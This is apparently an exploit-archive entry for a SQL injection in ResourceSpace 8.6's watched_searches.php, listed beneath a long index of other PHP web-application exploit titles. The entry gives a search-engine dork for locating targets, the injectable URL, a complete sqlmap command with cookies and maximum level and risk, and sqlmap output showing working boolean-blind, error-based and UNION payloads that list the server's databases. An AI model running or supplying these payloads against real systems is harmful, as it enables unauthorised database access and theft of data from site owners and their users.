Menu

"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection"

Author

dd_

Platform

php

Release date

2019-02-04

Release Date Title Type Platform Author
2019-02-15 "UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload" webapps php "Mohammad Danish"
2019-02-15 "qdPM 9.1 - 'search_by_extrafields[]' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-15 "MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 0xB9
2019-02-14 "LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)" webapps php 0xB9
2019-02-14 "WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection" webapps php B0UG
2019-02-14 "DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting" webapps php "Mohammed Abdul Kareem"
2019-02-14 "DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting" webapps php "Mohammed Abdul Kareem"
2019-02-14 "DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2019-02-14 "DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2019-02-14 "DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2019-02-13 "PilusCart 1.4.1 - 'send' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-13 "Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting" webapps php "Mehmet EMIROGLU"
2019-02-12 "LayerBB 1.1.2 - Cross-Site Scripting" webapps php 0xB9
2019-02-12 "OPNsense < 19.1.1 - Cross-Site Scripting" webapps php "Ozer Goker"
2019-02-11 "Webiness Inventory 2.3 - 'email' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-11 "VA MAX 8.3.4 - Authenticated Remote Code Execution" webapps php "Cody Sixteen"
2019-02-11 "MyBB Bans List 1.0 - Cross-Site Scripting" webapps php 0xB9
2019-02-06 "osCommerce 2.3.4.1 - 'reviews_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'products_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'currency' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-04 "SuiteCRM 7.10.7 - 'record' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "SuiteCRM 7.10.7 - 'parentTab' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "ResourceSpace 8.6 - 'watched_searches.php' SQL Injection" webapps php dd_
2016-07-07 "Tiki Wiki 15.1 - File Upload" webapps php "Ivan Ivanovic"
2019-01-30 "Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-01-29 "PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)" webapps php dd_
2019-01-28 "ResourceSpace 8.6 - 'collection_edit.php' SQL Injection" webapps php dd_
2019-01-28 "MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting" webapps php 0xB9
2019-01-28 "Mess Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-28 "Teameyo Project Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-28 "Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection" webapps php "Carlos Avila"
2019-01-28 "Newsbull Haber Script 1.0.0 - 'search' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-01-28 "CMSsite 1.0 - 'search' SQL Injection" webapps php "Majid kalantari"
2019-01-28 "CMSsite 1.0 - 'cat_id' SQL Injection" webapps php "Majid kalantari"
2019-01-28 "WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download" webapps php 41!kh4224rDz
2019-01-25 "Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing" webapps php MTK
2019-01-25 "GreenCMS 2.x - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "ImpressCMS 1.3.11 - 'bid' SQL Injection" webapps php "Mehmet Onder"
2019-01-24 "SimplePress CMS 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component JHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component J-CruisePortal 6.0.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component VMap 1.9.6 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vRestaurant 1.9.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vReview 1.9.11 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vWishlist 1.0.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - Remote Code Execution" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-22 "Joomla! Component Easy Shop 1.2.3 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "Adianti Framework 5.5.0 - SQL Injection" webapps php "Joner de Mello Assolin"
2019-01-21 "PHP Uber-style GeoTracking 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - 'dashID' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "MoneyFlux 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Reservic 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Coman 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Kepler Wallpaper Script 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-18 "Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload" webapps php _jazz______
2019-01-18 "Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings" webapps php "Praveen Sutar"
2019-01-18 "phpTransformer 2016.9 - Directory Traversal" webapps php "Ihsan Sencan"
2019-01-18 "phpTransformer 2016.9 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-18 "SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-16 "Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit" webapps php "Larry W. Cashdollar"
2019-01-16 "ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution" webapps php twosevenzero
2019-01-16 "doorGets CMS 7.0 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-16 "Roxy Fileman 1.4.5 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-15 "ownDMS 4.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Job Portal Platform 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Real Estate Custom Script 2.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "ThinkPHP 5.X - Remote Command Execution" webapps php vr_system
2019-01-14 "Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)" webapps php AllenChen
2019-01-14 "HealthNode Hospital Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Cleanto 5.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Find a Place CMS Directory 1.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin)" webapps php "Ihsan Sencan"
2019-01-14 "Twilio WEB To Fax Machine System Application 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Modern POS 1.3 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "Modern POS 1.3 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-14 "Horde Imp - 'imap_open' Remote Command Execution" webapps php "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-01-14 "i-doit CMDB 1.12 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-14 "i-doit CMDB 1.12 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-11 "Joomla! Component JoomCRM 1.1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-11 "Joomla! Component JoomProject 1.1.3.2 - Information Disclosure" webapps php "Ihsan Sencan"
2019-01-11 "Adapt Inventory Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "eBrigade ERP 4.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Event Locations 1.0.1 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Event Calendar 3.7.4 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "MLMPro 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Architectural 1.0 - 'email' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Shield CMS 2.2 - 'email' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "doitX 1.0 - 'search' SQL Injection" webapps php "Ihsan Sencan"
2019-01-10 "Matrix MLM Script 1.0 - Information Disclosure" webapps php "Ihsan Sencan"
2019-01-10 "eBrigade ERP 4.5 - Arbitrary File Download" webapps php AkkuS
2019-01-10 "PEAR Archive_Tar < 1.4.4 - PHP Object Injection" webapps php "Fariskhi Vidyan"
2019-01-08 "Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection" webapps php "Mehmet Onder"
2019-01-08 "CF Image Hosting Script 1.6.5 - (Delete all Pictures) Privilege Escalation" webapps php "David Tavarez"
2019-01-07 "Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal" webapps php "Pongtorn Angsuchotmetee_ Vittawat Masaree"
2019-01-07 "MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection" webapps php "Mehmet Onder"
2019-01-07 "Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation" webapps php "Noman Riffat"
2019-01-07 "phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Ozer Goker"
2019-01-07 "MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting" webapps php 0xB9
2019-01-07 "LayerBB 1.1.1 - Persistent Cross-Site Scripting" webapps php 0xB9
2019-01-07 "All in One Video Downloader 1.2 - Authenticated SQL Injection" webapps php "Deyaa Muhammad"
2019-01-07 "Embed Video Scripts - Persistent Cross-Site Scripting" webapps php "Deyaa Muhammad"
2019-01-02 "Vtiger CRM 7.1.0 - Remote Code Execution" webapps php AkkuS
2019-01-02 "Frog CMS 0.9.5 - Cross-Site Scripting" webapps php WangDudu
2019-01-02 "WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection" webapps php Kaimi
2018-12-27 "WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload" webapps php Kaimi
2018-12-27 "bludit Pages Editor 3.0.0 - Arbitrary File Upload" webapps php BouSalman
2018-12-27 "WordPress Plugin Audio Record 1.0 - Arbitrary File Upload" webapps php Kaimi
2018-12-27 "Craft CMS 3.0.25 - Cross-Site Scripting" webapps php "Raif Berkay Dincel"
2018-11-30 "PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)" webapps php "Alex Leahu"
2018-12-15 "phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read" webapps php VulnSpy
2018-12-24 "FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection" webapps php "Sainadh Jamalpur"
2018-12-24 "WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)" webapps php linfeng
2018-12-24 "WSTMart 2.0.8 - Cross-Site Scripting" webapps php linfeng
2018-12-21 "ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)" webapps php mqt
2018-12-19 "Yeswiki Cercopitheque - 'id' SQL Injection" webapps php "Mickael BROUTY"
2018-12-19 "Bolt CMS < 3.6.2 - Cross-Site Scripting" webapps php "Raif Berkay Dincel"
2018-12-19 "Integria IMS 5.0.83 - Cross-Site Request Forgery" webapps php "Javier Olmedo"
2018-12-19 "Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting" webapps php "Javier Olmedo"
2018-12-19 "Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)" webapps php AkkuS
2018-12-19 "Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)" webapps php "Sainadh Jamalpur"
2018-12-14 "Double Your Bitcoin Script Automatic - Authentication Bypass" webapps php Veyselxan
2018-12-14 "Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution" webapps php "Ihsan Sencan"
2018-12-14 "Facebook And Google Reviews System For Businesses 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2018-12-14 "Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)" webapps php Veyselxan
2018-12-14 "Responsive FileManager 9.13.4 - Multiple Vulnerabilities" webapps php "Fariskhi Vidyan"
2018-12-11 "ThinkPHP 5.0.23/5.1.31 - Remote Code Execution" webapps php VulnSpy
2018-12-11 "WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection" webapps php Kaimi
2018-12-11 "HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection" webapps php "Sainadh Jamalpur"
2014-02-17 "IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting" webapps php "Usman Saeed"
2018-12-11 "DomainMOD 4.11.01 - Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-11 "PrestaShop 1.6.x/1.7.x - Remote Code Execution" webapps php "Fariskhi Vidyan"
2018-12-11 "Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery" webapps php "Ihsan Sencan"
2018-12-11 "Tourism Website Blog - Remote Code Execution / SQL Injection" webapps php "Ihsan Sencan"
2018-12-09 "DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-09 "Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting" webapps php "Gustavo Sorondo"
2018-12-09 "i-doit CMDB 1.11.2 - Remote Code Execution" webapps php AkkuS
2018-12-05 "HasanMWB 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2018-12-04 "FreshRSS 1.11.1 - Cross-Site Scripting" webapps php Netsparker
2018-12-04 "DomainMOD 4.11.01 - Registrar Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-04 "NUUO NVRMini2 3.9.1 - Authenticated Command Injection" webapps php "Artem Metla"
2018-12-04 "DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-04 "DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-04 "Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting" webapps php AkkuS
2018-12-04 "KeyBase Botnet 1.5 - SQL Injection" webapps php n4pst3r
2018-12-04 "DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting" webapps php "Mohammed Abdul Raheem"
2018-12-03 "WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting" webapps php "Loading Kura Kura"
2018-12-03 "PHP Server Monitor 3.3.1 - Cross-Site Request Forgery" webapps php "Javier Olmedo"
2018-12-03 "Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection" webapps php "Ihsan Sencan"
2018-12-03 "Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution" webapps php AkkuS
2018-11-26 "No-Cms 1.0 - 'order_by' SQL Injection" webapps php "Loading Kura Kura"
2018-11-26 "Ticketly 1.0 - 'kind_id' SQL Injection" webapps php "Javier Olmedo"
2018-11-26 "WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting" webapps php En_dust
2018-11-21 "WebOfisi E-Ticaret V4 - 'urun' SQL Injection" webapps php AkkuS
2018-11-21 "WordPress CherryFramework Themes 3.1.4 - Backup File Download" webapps php b1p0l4r
2018-11-21 "Ticketly 1.0 - 'name' SQL Injection" webapps php "Javier Olmedo"
2018-11-20 "Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)" webapps php "Javier Olmedo"
2018-11-16 "DomainMOD 4.11.01 - Cross-Site Scripting" webapps php "Dawood Ansar"
2018-11-16 "Helpdezk 1.1.1 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-16 "Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting" webapps php MTK
2018-11-15 "PHP Mass Mail 1.0 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-15 "2-Plan Team 1.0.4 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-15 "Simple E-Document 1.31 - 'username' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "Kordil EDMS 2.2.60rc3 - Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-15 "Meneame English Pligg 5.8 - 'search' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "EverSync 0.5 - Arbitrary File Download" webapps php "Ihsan Sencan"
2018-11-15 "Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "Net-Billetterie 2.9 - 'login' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "BitZoom 1.0 - 'rollno' SQL Injection" webapps php "Ihsan Sencan"
2018-11-15 "PHP-Proxy 5.1.0 - Local File Inclusion" webapps php "Ameer Pornillos"
2018-11-15 "Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)" webapps php "Ihsan Sencan"
2018-11-14 "DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-14 "Electricks eCommerce 1.0 - Persistent Cross-Site Scripting" webapps php "Nawaf Alkeraithe"
2018-11-14 "Pedidos 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "Rmedia SMS 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "Advanced Comment System 1.0 - SQL Injection" webapps php "Rafael Pedrero"
2018-11-14 "EdTv 2 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)" webapps php "Nawaf Alkeraithe"
2018-11-14 "Helpdezk 1.1.1 - 'query' SQL Injection" webapps php "Ihsan Sencan"
2018-11-14 "iServiceOnline 1.0 - 'r' SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "SIPve 0.0.2-R19 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "Webiness Inventory 2.3 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)" webapps php "Ihsan Sencan"
2018-11-13 "Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download" webapps php "Ihsan Sencan"
2018-11-13 "Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload" webapps php "Ihsan Sencan"
2018-11-13 "ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload)" webapps php "Ameer Pornillos"
2018-11-13 "Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "Gumbo CMS 0.99 - SQL Injection" webapps php "Ihsan Sencan"
2018-11-13 "ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)" webapps php "Ihsan Sencan"

Unfortunately we've not tracked down any possible victims.

Ads

# Exploit Title: ResourceSpace <=8.6 'watched_searches.php' SQL Injection
# Dork: intext:"Powered by ResourceSpace"
# Date: 2019-02-01
# Exploit Author: dd_ (info@malicious.group)
# Vendor Homepage: https://www.resourcespace.com/
# Software Link: https://www.resourcespace.com/get
# Version: Stable release: 8.6 (Minor: 12603)
# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
# Research IRC: irc.blackcatz.org #blackcatz
# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.


# POC:
# 1)
# http://resourcespace.local/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=[SQL]&ajax=true&_=1548992497510



# Example:
#
[notroot@malicious ~]$ sqlmap -u 'http://resourcespace.local:80/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=2'\''&ajax=true&_=1548992497510' --cookie='cookiecheck=true;language=en-US;user=d170aee58aadb30833490bc38aecc85b;thumbs=show;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_find=some;display=thumbs;saved_offset=0;per_page=48;saved_sort=DESC;restypes=1%2C2%2C3%2C4' --dbms=mysql --level=5 --risk=3 --technique=BEUST -p ref --dbs



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:27:03 /2019-02-01/

[15:27:03] [WARNING] it appears that you have provided tainted parameter values ('ref=2'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[15:27:03] [INFO] testing connection to the target URL
[15:27:03] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ref (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: offset=0&callback=checknow&ref=2' AND 6321=6321# YBHT&ajax=true&_=1548992497510

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: offset=0&callback=checknow&ref=-5346 OR 1 GROUP BY CONCAT(0x716b6a6271,(SELECT (CASE WHEN (9852=9852) THEN 1 ELSE 0 END)),0x716b627671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ajax=true&_=1548992497510

    Type: UNION query
    Title: Generic UNION query (random number) - 12 columns
    Payload: offset=0&callback=checknow&ref=-5045 UNION ALL SELECT CONCAT(0x716b6a6271,0x676e72684e744a54485a747a4c5249684657485649744b416866756b7955614d646f636d457a7179,0x716b627671),6594,6594,6594,6594,6594,6594,6594,6594,6594,6594,6594-- ajba&ajax=true&_=1548992497510
---
[15:27:03] [INFO] testing MySQL
[15:27:04] [INFO] confirming MySQL
[15:27:04] [WARNING] reflective value(s) found and filtering out
[15:27:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.0
[15:27:04] [INFO] fetching database names
[15:27:04] [INFO] used SQL query returns 3 entries
[15:27:04] [INFO] resumed: 'information_schema'
[15:27:04] [INFO] resumed: 'mybb'
[15:27:04] [INFO] resumed: 'resourcespace'
available databases [3]:                                                                                                                                                                                         
[*] information_schema
[*] mybb
[*] resourcespace

[15:27:04] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/resourcespace.local'

[*] ending @ 15:27:04 /2019-02-01/